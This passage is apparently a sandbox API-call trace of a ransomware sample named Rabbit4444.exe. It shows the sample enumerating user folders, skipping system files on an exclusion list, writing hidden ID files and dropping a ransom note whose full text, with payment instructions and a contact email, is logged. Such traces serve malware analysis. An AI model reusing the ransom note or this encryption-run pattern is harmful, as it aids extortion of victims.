lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.616] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd98 [0060.616] WriteFile (in: hFile=0x2a0, lpBuffer=0x11ce360*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x11cdb1c, lpOverlapped=0x0 | out: lpBuffer=0x11ce360*, lpNumberOfBytesWritten=0x11cdb1c*=0x36, lpOverlapped=0x0) returned 1 [0060.617] CloseHandle (hObject=0x2a0) returned 1 [0060.618] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0060.618] lstrcmpiW (lpString1="My Pictures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.618] lstrcmpiW (lpString1="My Pictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.618] lstrcmpiW (lpString1="My Pictures", lpString2="Rabbit4444.exe") returned -1 [0060.618] lstrcmpiW (lpString1="My Pictures", lpString2=".") returned 1 [0060.618] lstrcmpiW (lpString1="My Pictures", lpString2="..") returned 1 [0060.618] lstrcmpiW (lpString1="My Pictures", lpString2="windows") returned -1 [0060.618] lstrcmpiW (lpString1="My Pictures", lpString2="bootmgr") returned 1 [0060.618] lstrcmpiW (lpString1="My Pictures", lpString2="pagefile.sys") returned -1 [0060.618] lstrcmpiW (lpString1="My Pictures", lpString2="boot") returned 1 [0060.618] lstrcmpiW (lpString1="My Pictures", lpString2="ids.txt") returned 1 [0060.618] lstrcmpiW (lpString1="My Pictures", lpString2="NTUSER.DAT") returned -1 [0060.618] lstrcpyW (in: lpString1=0x11ceb96, lpString2="My Pictures" | out: lpString1="My Pictures") returned="My Pictures" [0060.618] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures", dwFileAttributes=0x2412) returned 1 [0060.618] wsprintfA (in: param_1=0x11ce360, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\Documents\\My Pictures\r\n") returned 57 [0060.618] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\Documents\\My Pictures\r\n") returned 57 [0060.618] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.619] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xdce [0060.619] WriteFile (in: hFile=0x2a0, lpBuffer=0x11ce360*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x11cdb1c, lpOverlapped=0x0 | out: lpBuffer=0x11ce360*, lpNumberOfBytesWritten=0x11cdb1c*=0x39, lpOverlapped=0x0) returned 1 [0060.620] CloseHandle (hObject=0x2a0) returned 1 [0060.620] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0060.620] lstrcmpiW (lpString1="My Videos", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.620] lstrcmpiW (lpString1="My Videos", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.621] lstrcmpiW (lpString1="My Videos", lpString2="Rabbit4444.exe") returned -1 [0060.621] lstrcmpiW (lpString1="My Videos", lpString2=".") returned 1 [0060.621] lstrcmpiW (lpString1="My Videos", lpString2="..") returned 1 [0060.621] lstrcmpiW (lpString1="My Videos", lpString2="windows") returned -1 [0060.621] lstrcmpiW (lpString1="My Videos", lpString2="bootmgr") returned 1 [0060.621] lstrcmpiW (lpString1="My Videos", lpString2="pagefile.sys") returned -1 [0060.621] lstrcmpiW (lpString1="My Videos", lpString2="boot") returned 1 [0060.621] lstrcmpiW (lpString1="My Videos", lpString2="ids.txt") returned 1 [0060.621] lstrcmpiW (lpString1="My Videos", lpString2="NTUSER.DAT") returned -1 [0060.621] lstrcpyW (in: lpString1=0x11ceb96, lpString2="My Videos" | out: lpString1="My Videos") returned="My Videos" [0060.621] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Documents\\My Videos", dwFileAttributes=0x2412) returned 1 [0060.621] wsprintfA (in: param_1=0x11ce360, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\Documents\\My Videos\r\n") returned 55 [0060.621] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\Documents\\My Videos\r\n") returned 55 [0060.621] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.621] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe07 [0060.621] WriteFile (in: hFile=0x2a0, lpBuffer=0x11ce360*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x11cdb1c, lpOverlapped=0x0 | out: lpBuffer=0x11ce360*, lpNumberOfBytesWritten=0x11cdb1c*=0x37, lpOverlapped=0x0) returned 1 [0060.623] CloseHandle (hObject=0x2a0) returned 1 [0060.623] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0060.623] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0060.623] lstrcpyW (in: lpString1=0x11ceb96, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.623] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\documents\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0060.624] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0060.624] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.625] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.625] CloseHandle (hObject=0x298) returned 1 [0060.625] CloseHandle (hObject=0x2a0) returned 1 [0060.625] GetCurrentThreadId () returned 0xcc8 [0060.625] RtlInterlockedPopEntrySList (in: ListHead=0x122128 | out: ListHead=0x122128) returned 0x1221a8 [0060.625] lstrcpynW (in: lpString1=0x11ceb60, lpString2="C:\\Users\\Default\\Desktop", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0060.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102410 | out: hHeap=0xe0000) returned 1 [0060.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0060.625] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0060.625] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\" [0060.625] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\Desktop\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\Desktop\\.BFC0E91B00AE8A0620D3" [0060.625] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\desktop\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.626] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb68*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb20, lpOverlapped=0x0 | out: lpBuffer=0x11cdb68*, lpNumberOfBytesWritten=0x11ccb20*=0x3d4, lpOverlapped=0x0) returned 1 [0060.628] FlushFileBuffers (hFile=0x2a0) returned 1 [0060.629] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Desktop\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.630] CloseHandle (hObject=0x2a0) returned 1 [0060.630] lstrlenW (lpString="C:\\Users\\Default\\Desktop") returned 24 [0060.630] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.630] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed746b78, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0060.630] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.630] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.630] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.630] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.630] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ef8c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed746b78, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.631] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.631] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.631] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.631] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.631] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.631] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed746b78, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed746b78, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed76cd20, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.631] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.631] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.631] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed746b78, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed746b78, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed76cd20, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.631] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0060.631] lstrcpyW (in: lpString1=0x11ceb92, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.631] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\desktop\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0060.631] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0060.631] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.632] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.632] CloseHandle (hObject=0x29c) returned 1 [0060.632] CloseHandle (hObject=0x2a0) returned 1 [0060.632] GetCurrentThreadId () returned 0xcc8 [0060.632] RtlInterlockedPopEntrySList (in: ListHead=0x122128 | out: ListHead=0x122128) returned 0x0 [0060.632] GetCurrentThreadId () returned 0xcc8 [0060.632] WaitForMultipleObjects (nCount=0x0, lpHandles=0x11ce260*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0060.632] RtlInterlockedPopEntrySList (in: ListHead=0x122128 | out: ListHead=0x122128) returned 0x0 [0060.632] RtlInterlockedFlushSList (in: ListHead=0x122128 | out: ListHead=0x122128) returned 0x0 [0060.632] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0060.632] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff810 | out: hHeap=0xe0000) returned 1 [0060.632] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1258f0 | out: hHeap=0xe0000) returned 1 [0060.632] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127260 | out: hHeap=0xe0000) returned 1 [0060.632] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0060.632] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1257e8 | out: hHeap=0xe0000) returned 1 Thread: id = 17 os_tid = 0x2d4 [0061.536] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x1222e8 [0061.536] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0061.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102750 | out: hHeap=0xe0000) returned 1 [0061.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0061.536] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0061.536] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0061.536] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\.BFC0E91B00AE8A0620D3" [0061.537] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0061.537] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0061.537] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0061.537] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\.BFC0E91B00AE8A0620D3" [0061.537] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.538] ReadFile (in: hFile=0x2a0, lpBuffer=0x11cc770, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x11cc76c, lpOverlapped=0x0 | out: lpBuffer=0x11cc770*, lpNumberOfBytesRead=0x11cc76c*=0x3d4, lpOverlapped=0x0) returned 1 [0061.538] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x105560 [0061.538] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123038 [0061.538] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= ") returned 1047 [0061.538] lstrlenA (lpString="{{ID}}") returned 6 [0061.538] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0061.538] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x74c) returned 0x124d90 [0061.538] CloseHandle (hObject=0x2a0) returned 1 [0061.538] GetLastError () returned 0x0 [0061.538] lstrlenW (lpString="C:\\Users\\Default\\AppData") returned 24 [0061.538] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.538] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed4258c6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0061.538] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.538] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.538] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.538] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.538] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed4258c6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.539] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.539] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.539] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.539] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.539] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.539] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed4258c6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed4258c6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed44bae0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.539] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.539] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.539] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0061.539] lstrcmpiW (lpString1="Local", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.539] lstrcmpiW (lpString1="Local", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.539] lstrcmpiW (lpString1="Local", lpString2="Rabbit4444.exe") returned -1 [0061.539] lstrcmpiW (lpString1="Local", lpString2=".") returned 1 [0061.539] lstrcmpiW (lpString1="Local", lpString2="..") returned 1 [0061.539] lstrcmpiW (lpString1="Local", lpString2="windows") returned -1 [0061.539] lstrcmpiW (lpString1="Local", lpString2="bootmgr") returned 1 [0061.539] lstrcmpiW (lpString1="Local", lpString2="pagefile.sys") returned -1 [0061.539] lstrcmpiW (lpString1="Local", lpString2="boot") returned 1 [0061.539] lstrcmpiW (lpString1="Local", lpString2="ids.txt") returned 1 [0061.539] lstrcmpiW (lpString1="Local", lpString2="NTUSER.DAT") returned -1 [0061.539] lstrcpyW (in: lpString1=0x11cebba, lpString2="Local" | out: lpString1="Local") returned="Local" [0061.539] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0061.539] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x3e) returned 0x114fb8 [0061.539] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x1221a8 | out: ListHead=0x1220c8, ListEntry=0x1221a8) returned 0x0 [0061.539] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0061.539] lstrcmpiW (lpString1="Roaming", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.539] lstrcmpiW (lpString1="Roaming", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.539] lstrcmpiW (lpString1="Roaming", lpString2="Rabbit4444.exe") returned 1 [0061.539] lstrcmpiW (lpString1="Roaming", lpString2=".") returned 1 [0061.539] lstrcmpiW (lpString1="Roaming", lpString2="..") returned 1 [0061.539] lstrcmpiW (lpString1="Roaming", lpString2="windows") returned -1 [0061.539] 